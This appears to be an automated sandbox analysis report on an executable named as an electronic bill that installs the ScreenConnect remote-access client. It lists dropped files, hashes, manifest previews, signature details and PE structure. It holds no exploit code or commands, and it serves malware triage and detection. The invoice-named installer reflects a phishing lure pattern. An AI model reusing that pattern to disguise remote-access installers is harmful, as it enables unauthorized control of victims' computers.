File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsClient.exe.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsClient.exe.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\VCNBRBTC.6GR\VN3LZJ9O.VCX.application

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	118084
Entropy (8bit):	5.584890162201507
Encrypted:	false
SSDEEP:	3072:0aNIcT51/FXvMVNWfCXq9ymxm2o9HuzhJOvP:0FcfiVITmt8vOvP
MD5:	9F442D8293F1917B8CD6F007F3FEEBE6
SHA1:	3065E347263BFEA93CC987DF08E9630EBCF3E870
SHA-256:	CB63564F6233140A150E013346957F108A71E8B224A82FD68B6FD6418324D438
SHA-512:	58D79221BF7771535A878B11A4454BBAA75D6EFA087B4CB0DDA486E9E58A66F89D518A104AE8249471561FAC20BEBA39A5D011F4172DCFD72BAD931A26E534F0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	87
Entropy (8bit):	3.463057265798253
Encrypted:	false
SSDEEP:	3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
MD5:	D2DED43CE07BFCE4D1C101DFCAA178C8
SHA1:	CE928A1293EA2ACA1AC01B61A344857786AFE509
SHA-256:	8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
SHA-512:	A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
Malicious:	false
Preview:	......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1121
Entropy (8bit):	5.342215969645725
Encrypted:	false
SSDEEP:	24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzetJE4G1qE4j:MxHKiHKnYHKh3oPtHo6hAHKzetJHG1qD
MD5:	4F13BE23AEC301E86C0DE5CB433E8C51
SHA1:	1E2D836615D5F58BE6F783DE3419B72145C67328
SHA-256:	B04CE5777D696BE968DED9C867B6DF301E29727D2C7339F264A6A732E78B2EA4
SHA-512:	C7C9E26407235F2D2165D359407147592BC088BC188AF26548C78D308FEDF6D73A5A383ED88249092A454DBB85C4CEE6050D4874A3B4B927C379980B7F719467
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465544456693805
Encrypted:	false
SSDEEP:	6144:yIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN5dwBCswSb7:3XD94+WlLZMM6YFHX+7
MD5:	FF9709FFDF54FD3719C9B364AC58F667
SHA1:	FE2A1D02BCBBB51D2ECB7CA18369A5B6C6411908
SHA-256:	A4B724327B9F4E066868E2B2FAE13E576B36930E3AA2CDE041220D8BC4EE5321
SHA-512:	C005BC369B88EB94A34AA9D4D46045335932127453D391932853921955D7C40D4C99A16787BAACD4A69341EC1B0BB6FF5B2D5D70C60FD7CE0F1D3C7895040793
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.514721816536122
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	E_BILL9926378035.exe
File size:	83'352 bytes
MD5:	e0c83c9251ad547a2cc04812b2122ba7
SHA1:	bbafcaa8f7c38194c96762775ed219273e98b474
SHA256:	cfcbe98c7ff89685993e3ac70e3663989e730116c766373011a0d425fded3a84
SHA512:	965959bcd54fc35ebfb7a923e38358f22c80c70106df7f4f28cc38522aded54bafb74c833c6f8df2cb0e9c318faa7453a4b7d21ef6ff8d62da51d08008b71849
SSDEEP:	1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYH7IxD:7enkyfPAwiMq0RqRfbaxZJYYH
TLSH:	46835B43B5D18875E9720E3118B1D9B4593FBE110EA48EAB3398426E0F351D19E3AE7B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............\|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x401489
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	37d5c89163970dd3cc69230538a1b72b

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 01:00:00 16/08/2025 00:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007F2F3CFF30FAh
jmp 00007F2F3CFF2BAFh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040B048h]
push dword ptr [ebp+08h]
call dword ptr [0040B044h]
push C0000409h
call dword ptr [0040B04Ch]
push eax
call dword ptr [0040B050h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040B054h]
test eax, eax
je 00007F2F3CFF2D37h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1060c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11800	0x2d98
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14000	0xddc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xfe38	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xfd78	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9cf8	0x9e00	bae4521030709e187bdbe8a34d7bf731	False	0.6035650712025317	data	6.581464957368758	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x5d58	0x5e00	ec94ce6ebdbe57640638e0aa31d08896	False	0.4178025265957447	Applesoft BASIC program data, first line number 1	4.843224204192078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x11cc	0x800	04a548a5c04675d08166d3823a6bf61b	False	0.16357421875	data	2.0120795802951505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x13000	0x1e0	0x200	aa256780346be2e1ee49ac6d69d2faff	False	0.52734375	data	4.703723272345726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14000	0xddc	0xe00	908329e10a1923a3c4938a10d44237d9	False	0.7776227678571429	data	6.495696626464028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x13060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, 